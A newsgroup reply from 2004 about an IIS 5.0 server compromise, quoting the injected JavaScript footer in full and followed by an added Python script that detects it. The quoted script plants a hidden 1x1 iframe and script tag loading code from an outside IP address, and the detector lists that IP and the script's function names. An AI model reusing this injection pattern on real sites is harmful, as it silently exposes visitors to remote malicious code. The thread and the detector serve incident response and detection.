Re: Russian IIS hack? Malicious Javascript code

From: Ken (kanderson_at_pointclear.net)
Date: 06/24/04


Date: 23 Jun 2004 17:09:14 -0700

Oca Hoeflein <Oca Hoeflein@discussions.microsoft.com> wrote in message news:<F5E81692-8CC7-471B-9751-3A9C69ECB013@microsoft.com>...
> I successfully removed some malicious code from my IIS 5.0 server that may not have had all its patches updated, but I cannot find any information on this malicious code, which redirected the users of my websites on a random basis to a Russian website that appeared to be down, at a domain called balamut.com
> with an IP address of 217.107.218.147, which RDNS to
> unassigned.m10-msk-ru.e-neverland.net
>
> The JavaScript code lived in some fake dll files in the inetsrv folder.
> One fake .dll file was created for each web on my server, and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
>
> The offending code was embedded in every file that the website delivered, and on pages that had embedded .js files the JavaScript for those pages would not function.
>
> I have posted the offending code; maybe someone can identify this?
>
> As proof, check out a Google search for one of the functions in the code, okx12().
>
> You'll see the first link it returns is an RTF; if you view the HTML version you'll see this code appended to the bottom of the page.
>
> <script language="JavaScript"><!--
> var qxco7=document.cookie;function gc099(n21){var
> ix=qxco7.indexOf(n21+"=");if(ix==-1)return
> null;ix=qxco7.indexOf("=",ix)+1;var
> es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
> unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
> Date();var expiry=new
> Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
> expires="+expiry.toGMTString();qxco7=document.cookie;}function
> okx12(){window.status="";setTimeout("okx12()",
> 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script
> language=\"JavaScript\"
> src=\"http://217.107.218.147/dot.php\"></script><iframe
> src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
> scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}//
> --></script>

Oca, we had this same thing happen to our web server this morning. Did
you find a file called Flahqj32.exe in your system32 dir? We found
this in memory, and as long as it was in memory, we would get an out of
memory error every time we tried to get into the task manager. I
renamed it and restarted the server. This file was dated today at
about the time we started having the problem. Thanks for the above
fix. It saved our !@#$%! Also, I have been on the phone all day with
McAfee and I will call them tomorrow and give them your information
about this II*S exploit. I will also set up a test server tomorrow and
try to execute the Flahqj32.exe file on it and see if this was the
cause. Still wondering how this got on our web site!

Thanks again for your hard work.

Ken...
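A small detection script for the injection described in this thread, added here as an example and not code from either poster: it scans a directory (the inetsrv folder, or a site's content root) for files carrying the footer script's known function and cookie names, a script or iframe src pointing at a bare IP address, and a 1x1 iframe. The file names and the two footer samples below are constructed for the demo; the indicator values come from the quoted script.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the footer script quoted in the thread above.
KNOWN_IP = "217.107.218.147"
KNOWN_NAMES = ("okx12", "gc099", "sc088", "trk716")
# Generic heuristics for the technique: a script/iframe src pointing at a bare IP, and a
# 1x1 iframe. Quotes may be backslash-escaped, since the footer emits tags via document.write().
IP_SRC = re.compile(r'src=\\?"?https?://(\d{1,3}(?:\.\d{1,3}){3})/', re.I)
TINY_IFRAME = re.compile(r'<iframe[^>]*height=\\?"?1\\?"?[^>]*width=\\?"?1\\?"?', re.I)

def scan_text(text):
    """Return the sorted indicators found in one footer file or served page."""
    hits = {"name:" + n for n in KNOWN_NAMES if n in text}
    for m in IP_SRC.finditer(text):
        hits.add(("known-ip:" if m.group(1) == KNOWN_IP else "ip-src:") + m.group(1))
    if TINY_IFRAME.search(text):
        hits.add("hidden-iframe")
    return sorted(hits)

def scan_dir(root):
    """Scan every file under root (e.g. the inetsrv folder or a site's wwwroot); return {path: hits}."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            hits = scan_text(p.read_text(errors="replace"))
            if hits:
                findings[str(p)] = hits
    return findings

# Constructed samples: a benign footer and one modelled on the quoted script.
CLEAN_FOOTER = '<p class="footer">Copyright 2004 Example Corp.<script src="/js/menu.js"></script></p>'
INFECTED_FOOTER = r'''<script language="JavaScript"><!--
function okx12(){window.status="";setTimeout("okx12()",200);}okx12();
if(gc099("trk716")==null){document.write("<script language=\"JavaScript\"
src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\"
height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}//--></script>'''

def demo():
    """Write both samples into a temporary directory (constructed names), scan it and return {filename: hits}."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "footer_clean.dll").write_text(CLEAN_FOOTER)
        Path(d, "footer_fake.dll").write_text(INFECTED_FOOTER)
        return {Path(k).name: v for k, v in scan_dir(d).items()}
```

Pointing scan_dir at the inetsrv folder catches the fake footer files themselves; pointing it at saved HTTP responses catches the injected footer in what the server actually delivers, which is the check to repeat after cleanup until EnableDocFooter is confirmed off in the metabase.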
